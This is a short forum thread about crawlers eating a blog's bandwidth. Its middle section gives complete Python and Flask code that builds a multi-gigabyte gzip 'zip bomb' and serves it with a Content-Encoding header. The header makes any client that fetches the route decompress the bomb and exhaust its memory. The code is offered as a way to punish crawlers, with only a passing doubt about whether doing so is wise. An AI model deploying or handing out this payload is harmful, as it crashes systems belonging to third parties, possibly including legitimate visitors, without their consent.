Got a warning for my blog going over 100GB in bandwidth this month… which sounded incredibly unusual. My blog is text and a couple images and I haven’t posted anything to it in ages… like how would that even be possible?
Turns out it’s possible when you have crawlers going apeshit on your server. Am I even reading this right? 12,181 with 181 zeros at the end for ‘Unknown robot’? This is actually bonkers.


ProfitSilence: Can you just turn the robots.txt into a click-wrap agreement to charge robots high fees for access above a certain threshold?
why bother with an agreement when you can serve a zip bomb :D
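(For the curious, a "zip bomb" here usually means a tiny gzip-compressed response that inflates to gigabytes once the crawler decompresses it. A minimal sketch in Python of what that could look like; the file name, sizes, and the Flask route are illustrative assumptions, not anyone's production setup:)

```python
import gzip

# Build a small gzip file that decompresses to ~10 GiB of zero bytes.
# Zeros compress extremely well (roughly 1000:1), so the bandwidth cost
# stays in the tens of megabytes while any client that naively inflates
# the body pays the full ~10 GiB in memory.
CHUNK = b"\0" * (1024 * 1024)   # 1 MiB of zeros per write
TARGET_GIB = 10                 # decompressed size, illustrative

with gzip.open("bomb.gz", "wb", compresslevel=9) as f:
    for _ in range(TARGET_GIB * 1024):  # 10 GiB = 10 * 1024 MiB
        f.write(CHUNK)

# Hypothetical route for serving it: returning the raw bytes with a
# Content-Encoding: gzip header makes a well-behaved HTTP client
# transparently decompress the body on its end.
from flask import Flask, Response

app = Flask(__name__)

@app.route("/bot-trap/")
def bomb():
    with open("bomb.gz", "rb") as f:
        data = f.read()
    return Response(data, headers={"Content-Encoding": "gzip",
                                   "Content-Type": "text/html"})
```

The Content-Encoding header is the key bit: the transfer costs you a few megabytes, but the decompressed payload lands on the crawler's side. Whether you should actually do this to misbehaving bots is another question.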
Puts the full EU regulations in robots.txt